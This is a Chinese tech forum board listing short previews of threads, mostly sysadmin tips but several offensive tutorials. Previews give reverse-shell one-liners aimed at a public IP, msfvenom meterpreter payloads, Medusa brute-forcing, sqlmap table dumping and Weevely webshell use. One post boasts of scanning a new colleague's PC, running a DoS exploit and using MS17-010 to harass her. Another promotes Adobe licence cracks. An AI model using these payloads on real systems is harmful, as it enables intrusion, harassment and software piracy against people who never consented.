建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
366个主题在此版面
-
一:坦克大战源码 import java.util.ArrayList; import java.awt.*; import java.awt.event.*; import java.util.List; import javax.swing.JOptionPane; public class TankClient extends Frame implements ActionListener { /** * */ private static final long serialVersionUID = 1L; public static final int Fram_width = 800; // public static final int Fram_length = 600; public static boolean printable = true; MenuBar jmb = null; Menu jm1 = null, jm2 = null, jm3 = null, jm4 = null; MenuItem jmi1 = null, jmi2 = null, jmi3 = null, jmi4 = null, jmi5 = null, jmi6 = null, jmi7 = null, jmi8 = null, jmi9 = null; Image screenImage = null; …
-
- 0 篇回复
- 29 次查看
-
-
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机:Kali Linux :47.98.229.211 受害机:Centos 7 :149.129.68.117(阿里云服务器) 姿势一也是最常见的一种方式 Kali监听 nc -lvvp 4444centos运行 -i >& /dev/tcp/47.98.229.211/5555 0>&1执行命令后,成功得到反弹! 姿势二 python攻击机Kali还是监听 nc -lvvp 5555centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ ","-i"]);' 姿势三 nc 如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell 攻击…
-
- 0 篇回复
- 28 次查看
-
-
安装vsftpdyum install -y vsftpd设置开机启动systemctl enable vsftpd.service 重启service vsftpd restart查看vsftpd服务的状态systemctl status vsftpd.service配置vsftpd.conf备份配置文件cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak执行以下命令sed -i "s/anonymous_enable=YES/anonymous_enable=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#anon_upload_enable=YES/anon_upload_enable=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#anon_mkdir_write_enable=YES/anon_mkdir_write_enable=YES/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#chown_uploads=YES/chown_uploads=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#async_abor_enable=YES/async_abor_enable=YES/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#ascii_upload_enable=YES/ascii_…
-
- 0 篇回复
- 28 次查看
-
-
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。语法mudusa -h Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]命令详解: -h: 目的主机IP -H: 文件(有多个目标时,可以将IP放到一个文件中) -u: 单个用户名 -U: 用户名字典文件 -p :单个密码 -P: 密码文件 -M: 模块 指定用户名的密码破解如果用户名和协议都是已知的,我们可以使用medusa来破解密码。 命令如下: medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh 账号和密码破解用户名和密码都未知,命令如下 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M s…
-
- 0 篇回复
- 28 次查看
-
-
一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > sh…
-
- 0 篇回复
- 28 次查看
-
-
通常,我们利用ping命令来检测本地的网络是否流通,但是这样为常常给黑客提供了便利。那么liunx该如何关闭ping呢? 1、内核参数设置允许/禁止 ping 设置(默认允许 ping) 临时允许/禁止 ping 操作的命令为:修改 /proc/sys/net/ipv4/icmp_echo_ignore_all 文件的内容,该文件内容只有 1 个字符,0 为允许 ping,1 为禁止 ping,无需重启服务器; 永久允许/禁止 ping 配置方法: 修改文件 /etc/sysctl.conf,在文件末尾增加一行: net.ipv4.icmp_echo_ignore_all = 1如果已经有 net.ipv4.icmp_echo_ignore_all 这一行了,直接修改 = 号后面的值即可的 0 表示允许,1 表示禁止。 修改完成后执行 sysctl -p 使新配置生效(重要)。 2、防火墙设置(此处的方法的前提是内核配置是默认值,也就是没有禁止 ping) 这里以 iptables 防火墙为例,其他防火墙操作方法可参考防火墙的官方文档。 允许ping设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT或者也可以临时停止防火墙: service iptables stop禁止ping设置 -A INPUT -p icmp --icmp-type 8…
-
- 0 篇回复
- 28 次查看
-
-
Goby 是一款新的网络安全测试工具,由Zwell(Pangolin、JSky、FOFA 作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。我们希望能够输出更具生命力的工具,能够对标黑客的实际能力,帮助企业来有效地理解和应对网络攻击。 安装本文以Windows为列 首先下载 Npcap 数据捕获包,安装完成后,启动 goby即可! 下载地址: https://nmap.org/npcap/dist/npcap-0.9983.exe 使用1.资产收集 自动探测当前网络空间存活的 IP 及解析域名到 IP,轻量且快速的分析出端口对应的协议、Mac 地址、证书、应用产品、厂商等信息。 子域名扫描 自动爬取子域名,AXFR 监测,二级域名字典爆破,关联域名查询。同时支持连接 FOFA,扩大数据源。 网站截图 通过截图,快速判断网站系统应用,无须再一一打开。 注:该功能基于 Chrome 截图插件实现,需要预安装 Chrome 浏览器。 深度分析 发现非标准端口或非标准应用系统资产,进行深入的应用识别。在实战场景中非常有效。 代理扫描 通过 socket5 代理,快速进入内网,开启内网渗透。 注:支持 Pcap 及 socket 两种模式,请根据不同的场合动态切换。 pcap 模式:支持协议识别和漏洞扫描,不支持端口扫描; socket 模式:支持端口扫描协议识别以及漏洞扫描,扫描速度慢。 插件支持msfconsole 等插件的使用 总结安装方便简单,直接双击EXE即可…
-
- 0 篇回复
- 28 次查看
-
-
1.CCMaker CCMaker无疑是非常常用的一款Adboe套件安装器了,安装可选加装AMTEmu工具绕过授权验证机制,可以直接不登陆Adobe账户直接安装指定的套件,方便快捷。不过受限于国内网络环境,可能出现下载不稳定等情况。 2.嬴政天下系列 众所周知,嬴政天下系列的Adobe套件一直受到广大使用者们的喜爱,不论是长久来及时的更新,还是质量的优越都成就了如今的口碑。此系列可选完全和独立包,直装后即可使用。 3.Adobe.Anticloud插件 该插件使用方法简单,安装完所需的Adobe套件后直接安装此插件即可,原理为劫持授权检测模块。 4.amtemu插件 该插件一直以其轻巧,简介的优点为人所知,只需要选择要打补丁的程序,并且找到对应程序目录下的指定dll文件即可,效率较高。由于其高效的解决方案,因此使用时指定2017版本的程序亦可使用在2018版本程序中,不过部分版本设置可能需要修改以便达到最佳效果,此插件几乎不会触发任何安全软件警告
-
- 0 篇回复
- 28 次查看
-
-
一:首先查看磁盘使用情况df linux中df命令详解 -a 显示所有文件系统的磁盘使用情况,包括0块(block)的文件系统,如/proc文件系统。 -k 以k字节为单位显示。 -i 显示i节点信息,而不是磁盘块。 -t 显示各指定类型的文件系统的磁盘空间使用情况。 -x 列出不是某一指定类型文件系统的磁盘空间使用情况(与t选项相反)。 -T 显示文件系统类型。 二:清理垃圾sudo apt-get autoclean #清理旧版本的软件缓存 sudo apt-get clean #清理所有软件缓存 sudo apt-get autoremove #删除系统不再使用的孤立软件
-
- 0 篇回复
- 28 次查看
-
-
Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发,我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示! 请用Google浏览器下载因为!因为!因为!因为!因为!贼J快!快!快!快!快!快!快! 安装贼J 13简单,把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务,而不是启动程序。 获取激活码方法一 然后打开这个网页:https://www.tenable.com/products/nessus-home 随便输入,邮箱保证能收到邮件就好了。 方法二 运行程序后,在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息,添加证书即可。 效果如下: 选择第一个 如果你选择了第一种方法获取激活码,这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示! 如果失败!请多次重试!重试!重试!(因为贼J 13慢) 如果你运气好的话,很安装成功哦~ 输入刚才我们设置的密码,登录系统!
-
- 0 篇回复
- 28 次查看
-
-
前言平时自己比较赖,论坛和博客平时都需要维护。比如数据库备份,那么在平时的工作中怎么高效的完成数据库备份任务呢? 废话不在多说,上源码。 源码#! /bin/ sj=`date +%Y%m%d%H%M%S` read -p "要备份的数据库名:" sql mysqldump -u root -p $sql >/root/bf/数据库$sql备份`date +%Y%m%d%H%M%S`.sql echo "备份时间:$sj" >> /root/bf/log.txt。 echo "恭喜!数据库以备份"使用说明先在root目录下新建个bf文件夹将文件保存为sql.sh给脚本给与权限chmod -R 777 sql.sh终端命令./sql.sh输入要备份的数据库名称即可开始备份log.txt用来记录备份的日志。
-
- 0 篇回复
- 28 次查看
-
-
本文我们来看看基于树莓派4B的Openwrt,Openwrt是著名的路由器管理系统,因其开源,第三方可编译等优点被许多厂商使用。 恰好手头有个树莓派4B,刷入Openwrt做软路由。同时给其尝试加入各种插件。 配件准备树莓派4B开发板32G内存卡一根网线 选择固件这里我用的是Lean的树莓派openwrt固件。 作者项目地址:https://github.com/coolsnowwolf/openwrt 刷入固件打开工具win32,如下选择固件和磁盘位置,点击写入 写入成功后,将卡插入树莓派。启动树莓派。 登录后台将树莓派的的网口用网线连接至自己的电脑,然后在浏览器内输入192.168.1.1,如果连接没问题的话会直接跳转到openwrt后台界面。 默认用户名:root 默认登录密码:password 添加接口添加一个wan端口,协议为DHCP客户端,物理设置中勾选以太网适配器eth0 openwrt的优势openwrt和其他固件不同在于,可以安装很多插件。如广告屏蔽、云盘下载加速等。 网络储存 当然,我们也可以在路由器上大家Nginx和PHP环境。也就是说我们可以将路由器搭建成为一个小型的服务器。 配置ssh自己的东西,凭什么不能登录ssh。很多路由器固件是不能ssh登录的,而openwrt很简单。 配置ssh 登录ssh 搭建博客修改nginx配置文件 user root root; worker_processes 1; pid /var/run/nginx_kodexplorer.pid; event…
-
- 0 篇回复
- 28 次查看
-
-
很多人说病毒清除掉后留下很多尸体文件,虽然可以删除,但是他们无处不在,一个个干掉实在是太麻烦了。 比如viking留下的_desktop.ini;比如欢乐时光留下的desktop.ini、folder.htt;还比如病毒经常在你的硬盘跟目录下放上属性为系统+隐藏的autorun.inf,以及这个文件里run=字段后面的程序,数不胜数…… 那么如何来干掉这些垃圾?实际上你可以利用搜索功能从“我的电脑”范围内将这些垃圾搜索出来,然后CTRL+A全选,DEL删除!当然要记得搜索时在“更多高级选项”里把“搜索隐藏的文件和文件夹”和“搜索系统文件夹”两这个地方勾上,否则毛也搜不到! 以上是一个方法,但是下面这个方法会让你更爽,因为你不但要干掉这些该死的病毒,还能从中学会一些东西,能感受的到那些该死的文件被喀嚓的快感……那么还等什么,我们开始吧! 你将会看到一个批处理程序,基本上由DEL和FOR两个命令组成。基本框架和原理是很简单的:用FOR来循环所有的驱动器和目录,用DEL来删除目标文件。先看一下代码: FOR %%I IN (c:,d:,e:) DO CD /D %%I & FOR %% J IN (filename1, filename2, filename3) DO DEL %%J /A HS /F /S ECHO 目标文件删除完毕,按任意键退出 PAUSE 代码说明: 所有大写部分都是程序中不可修改的代码,红色和蓝色部分是可以修改的。 红色部分请修改成你当前的盘符,有多少个就写进去多少个,格式照猫画虎…
-
- 0 篇回复
- 27 次查看
-
-
w13scan一款插件化基于流量分析的被动扫描器安装git clone https://github.com/w-digital-scanner/w13scan.git cd w13scan #进入git目录 pip3 install -r requirements.txt cd W13SCAN #进入源码目录 python3 w13scan.py -h 被动扫描python3 w13scan.py -s 127.0.0.1:7778 --html #端口可省略,默认为7778,开启--html即实时生成html报告HTTPS支持如果想让w13scan被动模式支持https,先启动w13scan,然后在浏览器中访问 http://w13scan.ca 下载证书并信任它。 主动扫描-u 输入一个url进行扫描 --file 从文件中读取url扫描w13scan会对url进行参数分析并使用插件扫描,但不会进行爬虫。 结合动态爬虫扫描crawlergo + w13scan 自动扫描在目录 crawlergo_example spider.py展示了如何与crawlergo爬虫结合联动。 反连平台(非必须)修改 config.py下有关反连平台的设置,可类似修改为 #REVERSE USE_REVERSE = True #使用反连平台将False改为True REVERSE_HTTP_IP = "127.0.0.1" #回连http IP地址,需要改为服务器ip,不能改为0.0.0.0,因为程序无法识别 REVERSE_HTTP_PO…
-
- 0 篇回复
- 27 次查看
-
-
前言:软件: burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库,输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么,我们可以想象如果在输入框输入一段字符,使其合理拼接到sql中,是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’) sqlmap注入之(搜索型)注入验证是否有注入 我们直接输入一个字符k,点击搜索。 提示未见异常 我们输入关键字%k% 效果如下: QQ截图20190404110711.png 此时,我们可以得出,存在搜索型注入漏洞 攻击方式一 利用burp抓包,将包中的文件另存为2…
-
- 0 篇回复
- 27 次查看
-
-
本文将利用python调用nmap完成扫描,并将扫描结果通过表格的方式展示出来。以便扫描者更加清晰明了的观察扫描结果。 实验环境Python3nmap7.9 代码如下:#!/usr/bin/env pthon #--*--coding=utf-8--*-- #kali blog(https://blog.bbskali.cn) #逍遥子大表哥 import os from terminaltables import AsciiTable gateway = input('YOU IP Address:') print ("\033[31m稍等 正在扫描\033[0m") print ("当前网关变量为:",gateway) def scan(): scan = os.popen("nmap " + gateway + " -n -P").read() f = open('scan.txt','w') f.write(scan) f.close() devices = os.popen(" grep report scan.txt | awk '{print $5}' ").read() devices_mac = os.popen("grep MAC scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1 -d'/' ").…
-
- 0 篇回复
- 27 次查看
-
-
停电后,最折磨人的便是没有网了。笔记本有电池还能坚持下,可无论怎样,没网就可伶了。于是我们可以利用充电宝为光猫提供电源,实现没电后依旧能有网络。原理图 设备单充电宝(支持快充)诱骗器光猫电源 什么是诱骗器不论是QC充电器还是现在流行的PD充电器,内部都有协议芯片,所以要想让充电器输出快充电压,例如5V/9V/12V/15V/20V等,就需要在产品上加一个XSP06取电芯片,用这个协议芯片和充电器的协议芯片通讯,就可以输出需要的电压。诱骗器原理:通过USB数据口D+和D-,发送数据,模拟不同充电协议。从而诱导充电宝输出对应协议的输出电压。 经过尝试直接用充电宝输出电压—5V,这根本无法带动12v的光猫。 于是我们用诱骗器诱导充电宝输出12v电压(需充电宝支持12v输出) 利用诱导器诱导输出12v电压 成功启动光猫 后记这种方案,理论上支持所有12v-20v的直流用电器设备,如小米台灯,小米电风扇等设备。
-
- 0 篇回复
- 27 次查看
-
-
首先你的自己注册花生壳,这个不多聊了,不会的自己网上百度 我们重点说如何实现内网穿透,通过花生壳你会活得一个外网的域名 1、若服务器所接网络有分配真实动态公网IP地址,则进行配置就好了。用户可直接通过路由器设置端口映射,由花生壳域名绑定动态IP地址,实现外网通过域名访问局域网内搭建的服务。 2.内网穿透注:若服务器所接网络分配的为虚假的私网IP地址,或无法登录路由器设置端口映射,则可以通过花生壳的内网穿透功能实现外网访问,需进行开通穿透认证或购买付费服务详情戳我 点击客户端内网穿透,则跳转至花生壳管理的内网映射页面, 可直接在网页中对域名进行添加映射,即使不在服务器现场,也可以远程管理。 下面介绍内网映射添加步骤: ①点击【内网穿透】——【添加映射】 ②添加成功后,会生成一个外网访问地址。
-
- 0 篇回复
- 27 次查看
-
-
在这篇文章中,我们将向您展示如何重置MySQL root密码以备忘记。 以下步骤适用于任何现代Linux发行版。 首先停止MySQL或MariaDB服务 sudo systemctl stop mysql无需密码即可启动MySQL服务器 mysqld_safe --skip-grant-tables &登录到MySQL shell mysql -u root如何重置MySQL root密码 设置一个新的MySQL root密码 根据您在系统上运行的MySQL或MariaDB服务器版本,您需要使用不同的命令来恢复root密码。 您可以通过发出以下命令找到您的服务器版本: mysql --version mysql Ver 8.0.11 for Linux on x86_64( MySQL Community Server - GPL )如何重置MySQL root密码从上面的输出中可以看到,我运行的是MySQL 8.0.11版本。 如果您有MySQL 5.7.6及更高版本或MariaDB 10.1.20及更高版本,请运行以下命令: ALTER USER 'root'@'localhost' IDENTIFIED BY 'MY_NEW_PASSWORD'; FLUSH PRIVILEGES;如果您有MySQL 5.7.5及更早版本或MariaDB 10.1.20及更早版本,请运行以下命令: SET PASSWORD FOR 'root'@'localhost' = PASSWORD('MY_NEW_PASSWORD'); FL…
-
- 0 篇回复
- 27 次查看
-
-
AdGuard 是拥有可获取最佳网络冲浪体验所需全部功能的独特程序。其组合了世界上最高级的广告拦截器,隐私保护模块以及家长控制 - 可协同任何浏览器和应用工作。 在树莓派下安装wget https://static.adguard.com/adguardhome/release/AdGuardHome_linux_arm.tar.gz tar xvf AdGuardHome_linux_arm.tar.gz sudo ./AdGuardHome -s install一旦启动并运行,您可以在浏览器中输入以下内容,在端口3000上访问您的AdGuard Home Web界面 - http://192.168.10.20:3000/进行安装。 注意,如果你的的是VPS请在安全组中开启3000 80 等端口 接着下一步 设置web的端口,默认80这里我改成了81因为我本地80端口有web环境。为了避免冲突我改成了81。 设置管理员密码 到这里,我们就安装完成了,现在根据提示我们进行配置,我们这里以路由器为基础进行配置。 配置路由器登录路由器,在网络设置中修改DNS 这里将DNS修改为我们树莓派的ip 如果是电脑或者安卓手机,将dns改为127.0.0.1和树莓派ip 开始配置在浏览器中输入http://树莓派ip:81即可登录管理页面。 配置你的AdGuard在过滤——自定义过滤规则中添加我们的规则。 这里我们以屏蔽小米广告为例: ||douyin.com^ ||api.assistant.miui.com^$importan…
-
- 0 篇回复
- 27 次查看
-
-
中午还在午休,在以前公司上班的同时发来消息,说是数据库挂掉了。让我帮他看看。嗯……(虽然已离职,但是感情还是有的吗。)发来截图。的确是数据库挂掉了。 然后,开始了我一下午的填坑记。 恩嫩,mmp先看看能不能启动数据库。执行命令: service mysqld start恩 ,报错。 提示错误:/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则,找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ,早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着,对数据库没有操作。这个就怪了…… 没事,我们接着找原因,既然是mysql.sock文件丢失,能不能从其他地方复制一份呢? 结果还是失败 mmp。想着不行就直接从装数据库吧,但是他那边没有备份,这时只能用一首《凉凉》来形容当时的心境了。好吧!不放弃接着找原因。 对当前系统分析 系统:centos7数据库:mariadb引擎: apache 等等,centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK,我们试着启动mariadb service mariadb startOK,伟大的mysql终于启动了
-
- 0 篇回复
- 27 次查看
-
-
Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具,因此支持跨平台可以 任何有python环境的系统上使用。和Windows系统中一款类似的工具(中国菜刀)一样。 安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。 apt-get install weevely -y基础用法生成web shell格式如下: weevely generate <shell密码> <生成目录> 示例: weevely generate 8888 /root/88.php 连接web shell我们需将生成的web shell上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。 格式如下: weevely <URL> <password> [cmd] 示例: weevely http://192.168.1.2/88.php 8888 查看系统信息所需命令system_info 枚举用户文件枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过:audit_ filesystem ,来查看都支 持搜索哪些类型的用户文件。 查看PHP配置文件所需命令audit_phpconf 高级用法系统提权连接数据库sql_console sql_console -u root -p 12345678 对数据库进行脱裤所需命令:sql_dump sql_dump -dbms mysql tianyuan root 1…
-
- 0 篇回复
- 26 次查看
-
-
今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功…
-
- 0 篇回复
- 26 次查看
-
-
Burp Suite是一个用于测试网络应用程序安全性的图形化工具。该工具使用Java编写,由PortSwigger Web Security开发。 该工具有三个版本。可以免费下载的社区版、专业版和试用后可以购买的企业版。本文将全方位的讲解Burp的使用全过程,欢迎各位同仁提出独特的见解。 01Burp的启动我们可以再kali的菜单中,或者再终端执行burpsuite直接启动 02BURP的界面 03渗透第一步做好代理设置Burp的原理是,通过浏览器的代理,将浏览器的所有数据代理到brup中。再通过Burp对数据抓包,修改,放包最终达到所要的目的。 基于http的代理这里已kali自带的火狐浏览器为列,菜单-首选项-网络设置代理方式设置为手动代理IP和端口设置为127.0.0.1:8080 这样便完成了http的代理。 基于https的代理首先再浏览器中输入http://burp,点击右上角的CA Certificate下载证书 再浏览器中,导入下载的证书。 再浏览器代理中,勾选为所有协议使用相同代理服务器 重启浏览器后,便可以抓包了。 基于Android的代理相对而言,现在pc端用的比较少,而手机的用的比较多,那么能过用burp抓取手机的包吗? 首先确保手机和kali再同一个局域网,再通过ifconfig命令查看电脑端IP地址,然后再手机WiFi设置里面设置手机代理为电脑的IP 打开Burp Suite配置代理即可,IP为无线局域网的IP,端口设置为和手机端一致即可 配置burp打开burp,选择Proxy(代理)选项卡,会…
-
- 0 篇回复
- 26 次查看
-
-
一:登录数据库格式:mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库: 二:显示数据库:show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四:查询 select * from users; 五:新建数据库create database xxx;xxx为数据库的名称 六:删除数据库drop database xxx;
-
- 0 篇回复
- 26 次查看
-